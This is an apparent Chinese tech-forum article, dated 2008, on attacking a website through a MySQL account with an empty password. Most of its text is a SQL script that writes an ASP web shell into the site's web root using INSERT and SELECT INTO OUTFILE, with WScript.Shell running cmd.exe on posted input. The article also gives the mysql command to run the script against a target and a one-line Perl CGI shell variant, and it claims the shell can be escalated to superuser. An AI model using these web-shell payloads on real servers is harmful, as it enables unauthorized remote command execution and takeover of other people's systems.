利用mysql空密码进行攻击

时间：2008-03-26 来源：sdccf

来源：赛迪网技术社区作者：ameinge

一天,突然得到一网站的mysql的账号,并查到它的主页所在位置为c:\www\www,首先在网上下载一个cmd.asp程序,然后写一个cmd.sql程序以便进行连接,把cmd.asp上传至它的目录,cmd.sql内容如下:

use test; create table tmp(cmd TEXT); insert into tmp values("<%@ Language=VBScript %>"); insert into tmp values("<%"); insert into tmp values("Dim oScript"); insert into tmp values("Dim oScriptNet"); insert into tmp values("Dim oFileSys, oFile"); insert into tmp values("Dim szCMD, szTempFile"); insert into tmp values("On Error Resume Next"); insert into tmp values("' -- create the COM objects that we will be using -- '"); insert into tmp values('Set oScript = Server.CreateObject("WSCRIPT.SHELL")'); insert into tmp values('Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")'); insert into tmp values('Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")'); insert into tmp values("' -- check for a command that we have posted -- '"); insert into tmp values('szCMD = Request.Form(".CMD")'); insert into tmp values('If (szCMD <> "") Then'); insert into tmp values("' -- Use a poor mans pipe ... a temp file -- '"); insert into tmp values('szTempFile = "C:\" & oFileSys.GetTempName( )'); insert into tmp values('Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)'); insert into tmp values('Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)'); insert into tmp values("End If"); insert into tmp values("%>"); insert into tmp values("<HTML>"); insert into tmp values("<BODY>"); insert into tmp values('<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">'); insert into tmp values('<input type=text name=".CMD" size=45 value="<%= szCMD %>">'); insert into tmp values('<input type=submit value="Run">'); insert into tmp values("</FORM>"); insert into tmp values("<PRE>"); insert into tmp values('<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>'); insert into tmp values("<br>"); insert into tmp values("<%"); insert into tmp values("If (IsObject(oFile)) Then"); insert into tmp values("' -- Read the output from our command and remove the temp file -- '"); insert into tmp values("On Error Resume Next"); insert into tmp values("Response.Write Server.HTMLEncode(oFile.ReadAll)"); insert into tmp values("oFile.Close"); insert into tmp values("Call oFileSys.DeleteFile(szTempFile, True)"); insert into tmp values("End If"); insert into tmp values("%>"); insert into tmp values("</BODY>"); insert into tmp values("</HTML>"); select * from tmp into outfile "c:\\www\\www\\234.asp"; drop table tmp;

在用insert into往表里添加内容时，不能只用一个insert into将内容全部添加进去，要一行一行的加，不然就会出现错误，所以每一行都得有一个insert into.

然后进行连接:

c:\mysql\bin\mysql -u user -p password -h ip <cmd.sql

如果变为:

c:\mysql\bin\

则表明建立asp文件成功!然后:

http:\\www.xxx.com/234.asp

便可以得到一个普通用户的shell了!第一步成功了，成为超级用户也不会是难事吧!

如果通过mysql上传CGI文件的话就不用那么长篇了,

cmd.sql: use test; create table tmp(cmd TEXT); insert into tmp values('system @ARGV'); select * from tmp into outfile "c:\\www\\www\\234.cgi"; drop table tmp;

然后就可以通过http:\\www.xxx.com/234.cgi?dir c:\了,同样也得到了一个普通用户的shell了